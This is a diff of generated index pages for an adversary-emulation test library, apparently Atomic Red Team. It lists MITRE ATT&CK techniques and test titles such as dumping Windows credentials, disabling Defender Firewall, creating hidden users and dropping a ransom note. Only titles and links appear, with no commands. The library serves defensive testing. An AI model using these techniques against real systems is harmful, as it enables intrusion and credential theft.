- [T1098 Account Manipulation](../../T1098/T1098.md)
- Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws]
- T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1098.001 Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1098.001 Additional Cloud Credentials](../../T1098.001/T1098.001.md)
- Atomic Test #1: AWS - Create Access Key and Secret Key [iaas:aws]
- [T1053.001 At (Linux)](../../T1053.001/T1053.001.md)
- Atomic Test #1: At - Schedule a job [linux]
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -414,7 +421,8 @@
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- T1136.003 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1136.003 Cloud Account](../../T1136.003/T1136.003.md)
- Atomic Test #1: AWS - Create a new IAM user [iaas:aws]
- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md)
@@ -466,6 +474,7 @@
- T1505 Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
- Atomic Test #2: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
- [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md)
- Atomic Test #1: Create Systemd Service and Timer [linux]
- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -603,6 +612,7 @@
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
- Atomic Test #14: whois file download [linux, macos]
- [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
- Atomic Test #1: Connection Proxy [macos, linux]
- T1001.001 Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -4,7 +4,8 @@
- [T1552.003 Bash History](../../T1552.003/T1552.003.md)
- Atomic Test #1: Search Through Bash History [linux, macos]
- T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1110.004 Credential Stuffing](../../T1110.004/T1110.004.md)
- Atomic Test #2: SSH Credential Stuffing From MacOS [macos]
- [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
- Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
- Atomic Test #2: Extract passwords with grep [macos, linux]
@@ -202,7 +203,8 @@
- Atomic Test #9: chattr - Remove immutable file attribute [macos, linux]
- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036 Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
- Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
- Atomic Test #1: Decode base64 Data into Script [macos, linux]
@@ -454,6 +456,7 @@
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
- Atomic Test #14: whois file download [linux, macos]
- [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
- Atomic Test #1: Connection Proxy [macos, linux]
- Atomic Test #2: Connection Proxy for macOS UI [macos]
@@ -12,6 +12,8 @@
- Atomic Test #4: Access unattend.xml [windows]
- [T1555 Credentials from Password Stores](../../T1555/T1555.md)
- Atomic Test #1: Extract Windows Credential Manager via VBA [windows]
- Atomic Test #2: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] [windows]
- Atomic Test #3: Dump credentials from Windows Credential Manager With PowerShell [web Credentials] [windows]
- [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- Atomic Test #1: Run Chrome-password Collector [windows]
- Atomic Test #3: LaZagne - Credentials from Browser [windows]
@@ -359,10 +361,11 @@
- Atomic Test #4: Clear Windows Audit Policy Config [windows]
- [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
- Atomic Test #2: Disable Microsoft Defender Firewall [windows]
- Atomic Test #3: Allow SMB and RDP on Microsoft Defender Firewall [windows]
- Atomic Test #4: Opening ports for proxy - HARDRAIN [windows]
- Atomic Test #5: Open a local port through Windows Firewall to any profile [windows]
- Atomic Test #6: Allow Executable Through Firewall Located in Non-Standard Location [windows]
- Atomic Test #3: Disable Microsoft Defender Firewall via Registry [windows]
- Atomic Test #4: Allow SMB and RDP on Microsoft Defender Firewall [windows]
- Atomic Test #5: Opening ports for proxy - HARDRAIN [windows]
- Atomic Test #6: Open a local port through Windows Firewall to any profile [windows]
- Atomic Test #7: Allow Executable Through Firewall Located in Non-Standard Location [windows]
- [T1562.001 Disable or Modify Tools](../../T1562.001/T1562.001.md)
- Atomic Test #10: Unload Sysmon Filter Driver [windows]
- Atomic Test #11: Uninstall Sysmon [windows]
@@ -407,7 +410,7 @@
- Atomic Test #1: Hidden Window [windows]
- [T1564 Hide Artifacts](../../T1564/T1564.md)
- Atomic Test #1: Extract binary files via VBA [windows]
- Atomic Test #2: Create a user called "$" as noted here [windows]
- Atomic Test #2: Create a Hidden User Called "$" [windows]
- Atomic Test #3: Create an "Administrator " user (with a space on the end) [windows]
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1562.003 Impair Command History Logging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -439,7 +442,9 @@
- Atomic Test #1: MSBuild Bypass Using Inline Tasks (C#) [windows]
- Atomic Test #2: MSBuild Bypass Using Inline Tasks (VB) [windows]
- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1553.005 Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1553.005 Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md)
- Atomic Test #1: Mount ISO image [windows]
- Atomic Test #2: Mount an ISO image and run executable from the ISO [windows]
- [T1036.004 Masquerade Task or Service](../../T1036.004/T1036.004.md)
- Atomic Test #1: Creating W32Time similar named service using schtasks [windows]
- Atomic Test #2: Creating W32Time similar named service using sc [windows]
@@ -765,7 +770,8 @@
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1485 Data Destruction](../../T1485/T1485.md)
- Atomic Test #1: Windows - Overwrite file with Sysinternals SDelete [windows]
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1486 Data Encrypted for Impact](../../T1486/T1486.md)
- Atomic Test #5: PureLocker Ransom Note [windows]
- T1565 Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -1044,7 +1050,8 @@
- Atomic Test #1: Execute a Command as a Service [windows]
- Atomic Test #2: Use PsExec to execute a command on a remote host [windows]
- T1129 Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1072 Software Deployment Tools](../../T1072/T1072.md)
- Atomic Test #1: Radmin Viewer Utility [windows]
- T1569 System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1059.005 Visual Basic](../../T1059.005/T1059.005.md)
@@ -1111,7 +1118,8 @@
- Atomic Test #3: Copy and Execute File with PsExec [windows]
- Atomic Test #4: Execute command writing output to local Admin Share [windows]
- T1051 Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1072 Software Deployment Tools](../../T1072/T1072.md)
- Atomic Test #1: Radmin Viewer Utility [windows]
- T1080 Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1021.005 VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+6 -6
@@ -1,16 +1,16 @@
# Linux Atomic Tests by ATT&CK Tactic & Technique
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Account Manipulation](../../T1098/T1098.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Administration Command](../../T1609/T1609.md) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Additional Cloud Credentials](../../T1098.001/T1098.001.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | [At (Linux)](../../T1053.001/T1053.001.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Build Image on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deploy Container](../../T1610/T1610.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Clear Command History](../../T1070.003/T1070.003.md) | [Container API](../../T1552.007/T1552.007.md) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cloud Account](../../T1136.003/T1136.003.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -26,7 +26,7 @@
| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RC Scripts](../../T1037.004/T1037.004.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Proc Filesystem](../../T1003.007/T1003.007.md) | [System Information Discovery](../../T1082/T1082.md) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | [Local Account](../../T1136.001/T1136.001.md) | [Systemd Service](../../T1543.002/T1543.002.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Screen Capture](../../T1113/T1113.md) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Systemd Timers](../../T1053.006/T1053.006.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | |
| | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Trap](../../T1546.005/T1546.005.md) | [File Deletion](../../T1070.004/T1070.004.md) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
@@ -45,7 +45,7 @@
| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
